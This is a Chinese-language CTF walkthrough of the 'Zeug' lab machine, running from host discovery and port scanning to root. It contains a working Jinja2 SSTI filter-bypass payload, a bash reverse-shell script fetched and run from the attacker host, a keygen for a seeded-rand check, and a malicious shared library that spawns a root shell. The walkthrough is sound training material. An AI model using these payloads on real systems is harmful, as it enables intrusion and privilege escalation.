kali:192.168.56.104

主机发现

arp-scan -l

# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:05       (Unknown: locally administered)
192.168.56.100  08:00:27:ff:8c:0f       PCS Systemtechnik GmbH
192.168.56.118  08:00:27:cb:87:d4       PCS Systemtechnik GmbH

靶机:192.168.56.118

端口扫描

nmap 192.168.56.118

# nmap 192.168.56.118
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-08 18:21 CST
Nmap scan report for 192.168.56.118
Host is up (0.00035s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
5000/tcp open  upnp

看5000端口

可以文件上传

测试发现只准上传html htm文件，并且过滤了许多关键词

根据报错信息出现app.py，猜测存在ssti模板

/console确实存在

那么就把模板注入放在html的body里面，确实可以

过滤了很多东西，包括中括号

发现内置函数里面有eval

  {{lipsum.__globals__.__builtins__.eval("__impor""t__('o' 's').pop""en('whoami').read()")}}

尝试反弹shell无法执行，打算上传个反弹shell的脚本

# cat she.sh    
bash -i >& /dev/tcp/192.168.56.104/4567 0>&1

 {{lipsum.__globals__.__builtins__.eval("__impor""t__('o' 's').pop""en('wget http://192.168.56.104:6677/she.sh').read()")}}

 {{lipsum.__globals__.__builtins__.eval("__impor""t__('o' 's').pop""en('bash she.sh').read()")}}

# nc -lvnp 4567      
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.118] 43064
bash: cannot set terminal process group (420): Inappropriate ioctl for device
bash: no job control in this shell
cosette@zeug:~/zeug$ whoaim
whoaim
bash: whoaim: command not found
cosette@zeug:~/zeug$ whoami
whoami
cosette

cosette@zeug:~$ sudo -l
sudo -l
Matching Defaults entries for cosette on zeug:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,use_ptyUser cosette may run the following commands on zeug:(exia) NOPASSWD: /home/exia/seed

/home/exia/seed 可以提权到exia

并且cosette目录下面有一个seed_bak文件

传到主机上逆向一下

int __cdecl main(int argc, const char **argv, const char **envp)
{int v4; // [rsp+Ch] [rbp-14h] BYREFint v5; // [rsp+10h] [rbp-10h]int v6; // [rsp+14h] [rbp-Ch]unsigned __int64 v7; // [rsp+18h] [rbp-8h]v7 = __readfsqword(0x28u);banner(argc, argv, envp);srand(1u);v5 = rand();v6 = -559038737;v4 = 0;printf("Enter a number: ");__isoc99_scanf("%d", &v4);if ( v6 == (v5 ^ v4) )system("/bin/bash");elseputs("Wrong.");return 0;
}

v5是个伪随机数，如果v5^输入的值为-559038737则拿到shell

写个脚本

#include <stdio.h>
#include <stdlib.h>int main()
{srand(1u);int v5; v5 = rand();int v6 = -559038737;printf("%d\n", v5 ^ v6);return 0;
}

仿照写个解密脚本

#include <stdio.h>
#include <stdlib.h>int main()
{srand(1u);int v5;v5 = rand();int v6 = -559038737;printf("%d\n", v5 ^ v6);return 0;
}

-1255736440

cosette@zeug:~/zeug$ sudo -u exia /home/exia/seed
********************************************
* Hi, Cosette, it's time to plant the seed *
********************************************
Enter a number: -1255736440
exia@zeug:/home/cosette/zeug$ 

exia@zeug:~$ sudo -l
Matching Defaults entries for exia on zeug:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,use_ptyUser exia may run the following commands on zeug:(root) NOPASSWD: /usr/bin/zeug

在exia用户下，/user/bin/zeug可以提权

在反编译看看里面是什么指令

int __cdecl main(int argc, const char **argv, const char **envp)
{if ( dlopen("/home/exia/exia.so", 2) )return 0;fwrite("Error opening file\n", 1uLL, 0x13uLL, _bss_start);return 1;
}

尝试将exia.so的共享库加载到/home/exia目录中

跟之前wild靶场利用一样链接库劫持

# cat exia.c 
#include <stdio.h>
#include <stdlib.h>
__attribute__((constructor))
void init()
{setuid(0);setgid(0);unsetenv("LD_PRELOAD");system("/bin/bash");
}┌──(root㉿kali2)-[~/Desktop]
└─# gcc exia.c -shared -fPIC -o exia.so
exia.c: In function ‘init’:
exia.c:6:9: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]6 |         setuid(0);|         ^~~~~~
exia.c:7:9: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]7 |         setgid(0);|         ^~~~~~┌──(root㉿kali2)-[~/Desktop]
└─# python -m http.server 6677
Serving HTTP on 0.0.0.0 port 6677 (http://0.0.0.0:6677/) ...
192.168.56.118 - - [08/Mar/2024 21:37:44] "GET /exia.so HTTP/1.1" 200 -

exia@zeug:~$ wget http://192.168.56.104:6677/exia.so
--2024-03-08 07:37:42--  http://192.168.56.104:6677/exia.so
Connecting to 192.168.56.104:6677... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15520 (15K) [application/octet-stream]
Saving to: ‘exia.so’exia.so             100%[===================>]  15.16K  --.-KB/s    in 0.002s  2024-03-08 07:37:42 (7.33 MB/s) - ‘exia.so’ saved [15520/15520]exia@zeug:~$ sudo -l
Matching Defaults entries for exia on zeug:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,use_ptyUser exia may run the following commands on zeug:(root) NOPASSWD: /usr/bin/zeug
exia@zeug:~$ sudo /usr/bin/zeug
root@zeug:/home/exia# cat /root/r*
HMYVM{root_Ut9RX5o7iZVKXjrOgcGW3fxBq}

总结:1.SSTI注入绕过，可以先上传一个反弹shell的sh文件然后再bash执行

        2.伪随机数求解

        3.动态链接库劫持